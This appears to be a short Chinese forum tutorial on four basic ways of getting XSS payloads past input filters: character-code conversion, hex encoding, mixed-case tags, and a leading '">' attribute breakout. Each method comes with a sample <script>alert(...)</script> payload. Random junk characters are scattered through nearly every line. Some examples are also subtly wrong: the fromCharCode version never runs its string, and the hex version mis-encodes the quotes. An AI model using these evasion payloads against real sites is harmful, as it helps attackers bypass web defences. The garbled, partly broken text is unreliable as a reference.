四种超级基础的绕过方法。) Q1 {9 e# O3 d- b- ]8 [& w6 _1 f
1.转换为ASCII码5 ]" v! k2 e }! [/ r
例子:原脚本为<script>alert(‘I love F4ck’)</script >2 K0 h1 |6 |5 j$ T* n2 r
通过转换,变成:
3 |, h+ E. |9 D<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 8216, 73, 32, 108, 111, 118, 101, 32, 70, 52, 99, 107, 8217, 41) </script>: M; V5 [9 h4 `2 g- o! k/ Z. U8 E
( N8 N3 L5 x6 N0 [3 g
2.转换为HEX(十六进制)) [* o- c# N: d9 j S) \* x
例子:原脚本为<script>alert(‘I love F4ck’)</script>% K" G& F0 L* G' \) x4 N
通过转换,变成:
- C/ j* \3 Q: w7 x' M4 s* I%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2018%49%20%6c%6f%76%65%20%46%34%63%6b%2019%29%3c%2f%73%63%72%69%70%74%3e
0 ?. B/ f" Y& n, Q/ T9 C$ z2 e " t0 s1 H1 D: l$ H
3.转换脚本的大小写
( i% q1 F; c: W- W+ L例子:原脚本为<script>alert(‘I love F4ck’)</script>
0 f/ q: E, g, |. D! m转换为:<ScRipt>AleRt(‘I love F4ck’)</sCRipT>) e4 M# j- O% p
( R9 Y4 y0 x" a2 E. y4.增加闭合标记”>: S9 y7 B" T& J6 b
例子:原脚本为<script>alert(‘I love F4ck’)</script>+ \) r; A+ ]2 N$ V
转换为:”><script>alert(‘I love F4ck’)</script>
& x1 Y; m3 E: Z更详细绕过技术请参考此网页
4 b* l, i% [/ R L) `https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet8 m [1 H) f6 C0 Z$ @$ c
7 x" r- @6 X; A% v. x" s S' k转换工具使用的是火狐的 hackbar mozilla addon. |